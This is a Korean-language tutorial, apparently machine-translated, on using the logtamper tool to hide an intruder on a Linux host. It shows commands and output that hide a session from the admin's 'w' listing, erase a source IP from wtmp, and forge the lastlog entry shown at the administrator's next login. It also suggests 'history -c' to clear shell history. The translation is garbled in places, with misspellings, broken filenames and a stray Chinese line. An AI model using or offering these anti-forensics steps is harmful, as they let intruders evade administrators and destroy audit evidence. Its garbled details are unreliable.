Linux 에서 흔적 지우 기 및 자신 숨 기기 - last login 지우 기

logtamper 를 사용 하면 로그 흔적 만 지 울 수 있 으 며, 주로 utmp, wtmp, lastlog 를 대상 으로 합 니 다.사실 Liux 시스템 은 중요 한 흔적 로 그 를 남 길 것 입 니 다. lastlog, utmp, wtmp, messages, syslog, sulog 가 있 기 때문에 도구 에 완전히 의존 할 수 없습니다.
또한, 각종 셸 은 사용자 가 사용 하 는 명령 의 역 사 를 기록 합 니 다. 사용자 홈 디 렉 터 리 에 있 는 파일 로 명령 의 역 사 를 기록 합 니 다. 보통 이 파일 의 이름 은. sh 입 니 다.history (ksh),. history (csh), 또는. bashhistory (bash) 등.대. bashhistory (bash), 간단하게 histroy - c 를 사용 하여 기록 을 지 울 수 있 습 니 다.
logtamper version 1.1 logtamper 는 * * Liux 로 그 를 수정 하 는 도구 입 니 다. 로그 파일 을 수정 하 는 동시에 수 정 된 파일 의 시간 정 보 를 유지 할 수 있 습 니 다 (atime 은 변경 되 지 않 았 습 니 다. 필요 하지 않 습 니 다).

[root@localhost logtamper]# ./logtamper-static
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu

logtamper [-f utmp_filename] -h username hostname hide username connected from hostname
logtamper [-f wtmp_filename] -w username hostname erase username from hostname in wtmp file
logtamper [-f lastlog_filename] -m username hostname ttyname YYYY[:MM[:DD[:hh[:mm[:ss]]]]] modify lastlog info

- f 옵션: 수정 할 파일 의 경 로 를 지정 하 는 데 사용 할 옵션 입 니 다.시스템 에 따라 로그 저장 경로 가 다 르 기 때문에 수 동 으로 지정 할 수 있 습 니 다.기본 로그 저장 장 소 는: 

#define UTMPFILE “/var/run/utmp”
#define WTMPFILE “/var/log/wtmp”
#define LASTLOGFILE “/var/log/lastlog”

- h 옵션: 가끔 관리자 와 동시에 온라인 을 하면 관리자 w 가 당신 을 볼 수 있 습 니 다.- h 옵션 을 사용 하면 사용자 가 관리자 w 를 피 합 니 다. 아래 와 같 습 니 다.

[root@localhost logtamper]# w
21:27:25 up 5 days, 13:48, 4 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 – Fri14 18:24m 0.33s 0.33s -bash
root pts/3 192.168.80.1 21:21 6:22 0.04s 0.04s -bash
root pts/2 192.168.80.1 21:06 0.00s 0.13s 0.00s w
root pts/4 192.168.80.1 21:21 5:52 0.03s 0.03s -bash

우 리 는 192.168.801 기계 에서 연결 되 었 는데 지금 은 숨 기 고 있다.

[root@localhost logtamper]# ./logtamper-static -h root 192.168.80.1
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu

Seems you’re invisible Now…Check it out!

[root@localhost logtamper]# w
21:27:46 up 5 days, 13:48, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 – Fri14 18:24m 0.33s 0.33s -bash
[root@localhost logtamper]#

- w 옵션: 로그 인 로 그 를 지 우 는 데 사 용 됩 니 다. 현재 Liux 로 그 는 58823 입 니 다. 도 구 를 거 칠 게 만 들 었 습 니 다. 이 기 계 는 일부 hostname 을 지 우 는 기 계 를 지정 할 수 있 습 니 다.

[root@localhost logtamper]# last
root tty1 Wed Oct 1 21:30 – 21:30 (00:00)
root pts/4 192.168.80.1 Wed Oct 1 21:21 still logged in
root pts/3 192.168.80.1 Wed Oct 1 21:21 still logged in

wtmp begins Wed Oct 1 06:01:46 2008

清除192.168.80.1的登录日志：

[root@localhost logtamper]# ./logtamper-static -w root 192.168.80.1
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu

Aho,you are now invisible to last…Check it out!
[root@localhost logtamper]# last
root tty1 Wed Oct 1 21:30 – 21:30 (00:00)

wtmp begins Wed Oct 1 06:01:46 2008
[root@localhost logtamper]#

- m 옵션: 마지막 로그 인 장 소 를 수정 하 는 데 사 용 됩 니 다. ssh 로 로그 인 할 때 이 점 을 알 수 있 습 니 다. 

login as: root
Sent username “root”
[email protected]’s password:
Last login: Wed Oct 1 21:31:40 2008 from 192.168.80.45
[root@localhost ~]#

lastlog 를 수정 하지 않 으 면 관리자 가 다음 로그 인 할 때 우리 의 기계 IP 로그 인 을 알려 줍 니 다.- m 옵션 을 사용 하면 이 옵션 을 편집 할 수 있 습 니 다.
 

[root@localhost logtamper]# ./logtamper-static -m root 1.2.3.4 tty10 2008:1:1:1:1:1
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu

Aho, now you never come here before…Check it out!
[root@localhost logtamper]#

물론 이것 은 예 일 뿐 입 니 다. 사용 중 에 여러분 은 구체 적 인 정보 에 따라 수정 하 십시오. 다음 에 관리자 가 로그 인하 면 로그 인 인터페이스 가 됩 니 다.

login as: root
Sent username “root”
[email protected]’s password:
Last login: Tue Jan 1 01:01:01 2008 from 1.2.3.4
[root@localhost ~]#